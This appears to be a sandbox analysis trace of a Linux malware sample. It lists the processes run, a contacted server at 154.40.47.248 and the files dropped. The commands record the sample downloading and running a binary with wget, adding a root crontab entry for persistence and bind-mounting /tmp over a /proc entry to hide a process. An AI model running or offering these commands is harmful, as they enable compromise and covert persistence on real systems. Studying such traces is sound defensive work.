[rm -f linux_mipsel]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mipsel]

/bin/sh

[/bin/sh -c /etc/32676&]

/etc/32676

[/etc/32676]

/usr/sbin/service

[service crond start]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/chmod

[chmod +x linux_mipsel]

/tmp/linux_mipsel

[./linux_mipsel]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/rm

[rm -f linux_mipsel]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 785]

/bin/mount

[mount -o bind /tmp/ /proc/785]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_mips

/etc/.walk

/etc/.walk

/etc/32676

/tmp/linux_mipsel

/.mod

/usr/bin/include/find

/etc/profile.d/gateway.sh